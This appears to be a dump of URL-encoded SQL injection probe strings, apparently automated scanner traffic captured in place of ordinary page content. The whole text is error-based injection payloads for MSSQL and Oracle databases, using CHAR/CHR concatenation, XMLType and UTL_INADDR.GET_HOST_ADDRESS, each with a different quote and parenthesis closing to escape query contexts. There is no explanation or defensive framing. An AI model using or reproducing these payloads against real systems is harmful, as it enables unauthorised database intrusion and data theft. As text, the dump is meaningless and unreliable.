-9439%22%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22VSxp%22%20LIKE%20%22VSxp -3083%22%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22NvYz%22%20LIKE%20%22NvYz -1237%22%29%29%29%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22MoUZ%22%20LIKE%20%22MoUZ -6971%22%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22VNtS%22%20LIKE%20%22VNtS -4994%29%20WHERE%209844%3D9844%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -3788%27%29%20WHERE%204292%3D4292%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -7392%27%20WHERE%209921%3D9921%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -3569%22%20WHERE%206762%3D6762%20OR%203643%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283643%3D3643%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 -9904%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -9414%27%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -9554%27%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8009%22%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -4731%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%282900%3D2900 -8174%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%286562%3D6562 -1330%29%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%289666%3D9666 -4944%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8177%27%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27vGsw%27%3D%27vGsw -6071%27%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27LaMr%27%3D%27LaMr -4412%27%29%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27RQpO%27%3D%27RQpO -4083%27%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27iBcn%27%3D%27iBcn -2775%27%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27LrnL%27%20LIKE%20%27LrnL -6015%27%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27WnHC%27%20LIKE%20%27WnHC -2804%27%29%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27iVrB%27%20LIKE%20%27iVrB -4397%27%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27ZmHK%27%20LIKE%20%27ZmHK -7333%22%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22OYuC%22%3D%22OYuC -5483%22%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22tTxN%22%3D%22tTxN -5016%22%29%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22sXyg%22%3D%22sXyg -2407%22%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22HfQY%22%3D%22HfQY -7541%22%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22elJW%22%20LIKE%20%22elJW -8279%22%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22zldw%22%20LIKE%20%22zldw -4741%22%29%29%29%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22Sonc%22%20LIKE%20%22Sonc -2663%22%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22hroK%22%20LIKE%20%22hroK -7039%29%20WHERE%204538%3D4538%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8781%27%29%20WHERE%202097%3D2097%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -9673%27%20WHERE%204492%3D4492%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1169%22%20WHERE%203205%3D3205%20OR%206816%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286816%3D6816%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -1177%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -9084%27%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -4267%27%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -7867%22%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -4341%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%282228%3D2228 -2161%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%288933%3D8933 -5213%29%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%284871%3D4871 -9676%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -6665%27%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%27KUuL%27%3D%27KUuL -4157%27%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27lZnP%27%3D%27lZnP -4877%27%29%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27PVXI%27%3D%27PVXI -7847%27%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%27XLmR%27%3D%27XLmR -4529%27%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%27jsoZ%27%20LIKE%20%27jsoZ -2617%27%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27mgsS%27%20LIKE%20%27mgsS -7695%27%29%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27vOUc%27%20LIKE%20%27vOUc -2593%27%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%27SKNN%27%20LIKE%20%27SKNN 